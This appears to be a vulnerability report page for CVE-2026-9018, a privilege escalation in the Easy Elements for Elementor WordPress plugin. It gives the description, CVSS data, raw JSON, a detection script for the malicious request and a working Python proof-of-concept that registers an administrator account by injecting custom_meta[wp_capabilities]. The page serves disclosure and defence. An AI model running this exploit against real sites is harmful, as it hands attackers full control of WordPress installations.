Security Vulnerability Report
CVE-2026-9018 CVSS 8.8 HIGH

CVE-2026-9018

Published: 2026-05-22 05:16:28
Last Modified: 2026-05-22 05:16:28

Description

The Easy Elements for Elementor – Addons & Website Templates plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.4.5 via the `easyel_handle_register()` function. This is due to the `wp_ajax_nopriv_eel_register` AJAX handler iterating the attacker-controlled `custom_meta` POST array and writing every supplied key-value pair to the newly created user's meta via `update_user_meta()` without any key whitelist or blocklist, allowing the `wp_capabilities` user meta key to be overwritten after `wp_insert_user()` has already assigned a safe role. This makes it possible for unauthenticated attackers to register a new account with full administrator-level privileges by supplying `custom_meta[wp_capabilities][administrator]=1`. Exploitation requires that user registration is enabled on the site and that at least one page exposes the Login/Register widget, which publishes the required `easy_elements_nonce` into the page DOM where it can be retrieved by any unauthenticated visitor via a simple GET request.
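A detection check for the request shape described above, as an added example that is not code from the plugin or from this report. It assumes captured POST bodies are available (for instance from a WAF or proxy audit log). The record fields and sample data are constructed, and it generalizes from `wp_capabilities` to any table prefix plus the companion `user_level` key.

```python
import re
from urllib.parse import parse_qsl

# Meta keys that carry roles or privilege levels. WordPress stores them as
# "<table prefix>capabilities" and "<table prefix>user_level", so match the suffix.
PROTECTED_SUFFIXES = ("capabilities", "user_level")
META_FIELD = re.compile(r"^custom_meta\[([^\]]+)\]")


def flagged_meta_keys(body: str) -> list[str]:
    """Return the custom_meta keys in an eel_register POST body that target
    role or capability meta. An empty list means nothing to report."""
    fields = parse_qsl(body, keep_blank_values=True)  # percent-decodes names
    if dict(fields).get("action") != "eel_register":
        return []
    hits = set()
    for name, _value in fields:
        match = META_FIELD.match(name)
        if match and match.group(1).strip().lower().endswith(PROTECTED_SUFFIXES):
            hits.add(match.group(1))
    return sorted(hits)


def scan(records: list[dict]) -> list[dict]:
    """Run the check over captured requests to admin-ajax.php."""
    alerts = []
    for rec in records:
        if not rec["path"].endswith("/wp-admin/admin-ajax.php"):
            continue
        keys = flagged_meta_keys(rec["body"])
        if keys:
            alerts.append({"time": rec["time"], "client": rec["client"], "keys": keys})
    return alerts


# Constructed sample records (hypothetical field names, documentation IP ranges).
SAMPLE = [
    {"time": "2026-05-22T06:01:10Z", "client": "198.51.100.7", "path": "/wp-admin/admin-ajax.php",
     "body": "action=eel_register&username=alice&custom_meta%5Bphone%5D=555-0100"},
    {"time": "2026-05-22T06:02:44Z", "client": "203.0.113.9", "path": "/wp-admin/admin-ajax.php",
     "body": "action=eel_register&username=bob&custom_meta%5Bwp_capabilities%5D%5Badministrator%5D=1"},
    {"time": "2026-05-22T06:03:02Z", "client": "203.0.113.9", "path": "/wp-admin/admin-ajax.php",
     "body": "action=heartbeat&custom_meta%5Bwp_capabilities%5D=x"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE):
        print(alert)
```

The same suffix test, inverted into an allowlist of expected profile fields, is the server-side control the description says the handler lacks.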

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Easy Elements for Elementor <= 1.4.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Configuration
target_url = "http://example.com"
username = "attacker"
password = "P@ssw0rd!"
email = "[email protected]"

# 1. Get the nonce from the page containing the Login/Register widget
# The nonce is usually exposed in the DOM with ID or class related to the plugin
print("[+] Fetching nonce...")
session = requests.Session()
index_page = session.get(target_url)

# Note: In a real scenario, parse the HTML to find 'easy_elements_nonce'
# Example: nonce = re.search(r'data-nonce="(.*?)"', index_page.text).group(1)
# For this PoC, we assume we extracted it.
nonce = "EXTRACTED_NONCE_VALUE"

# 2. Exploit the Privilege Escalation
ajax_url = f"{target_url}/wp-admin/admin-ajax.php"
payload = {
    "action": "eel_register",
    "easy_elements_nonce": nonce,
    "username": username,
    "email": email,
    "pass": password,
    # This is the vulnerable part: injecting wp_capabilities
    "custom_meta[wp_capabilities][administrator]": "1"
}

print(f"[+] Sending payload to {ajax_url}...")
response = session.post(ajax_url, data=payload)

if response.status_code == 200:
    print("[+] Registration request sent.")
    print(f"[+] Try logging in at {target_url}/wp-admin with user: {username}")
else:
    print("[-] Request failed.")
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-9018", "sourceIdentifier": "[email protected]", "published": "2026-05-22T05:16:28.067", "lastModified": "2026-05-22T05:16:28.067", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Easy Elements for Elementor – Addons & Website Templates plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.4.5 via the `easyel_handle_register()` function. This is due to the `wp_ajax_nopriv_eel_register` AJAX handler iterating the attacker-controlled `custom_meta` POST array and writing every supplied key-value pair to the newly created user's meta via `update_user_meta()` without any key whitelist or blocklist, allowing the `wp_capabilities` user meta key to be overwritten after `wp_insert_user()` has already assigned a safe role. This makes it possible for unauthenticated attackers to register a new account with full administrator-level privileges by supplying `custom_meta[wp_capabilities][administrator]=1`. 
Exploitation requires that user registration is enabled on the site and that at least one page exposes the Login/Register widget, which publishes the required `easy_elements_nonce` into the page DOM where it can be retrieved by any unauthenticated visitor via a simple GET request."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-269"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/easy-elements/tags/1.4.5/includes/Utils/Enqueue.php#L200", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/easy-elements/tags/1.4.5/widgets/login-register/class.login-register.php#L128", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/easy-elements/tags/1.4.5/widgets/login-register/class.login-register.php#L65", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/easy-elements/tags/1.4.5/widgets/login-register/class.login-register.php#L9", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f1de4899-532a-4558-bff0-f4610bfdd49d?source=cve", "source": "[email protected]"}]}}